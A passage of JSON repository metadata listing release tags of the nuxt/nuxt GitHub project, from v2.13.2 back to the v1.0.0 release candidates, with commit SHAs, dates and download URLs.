c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/t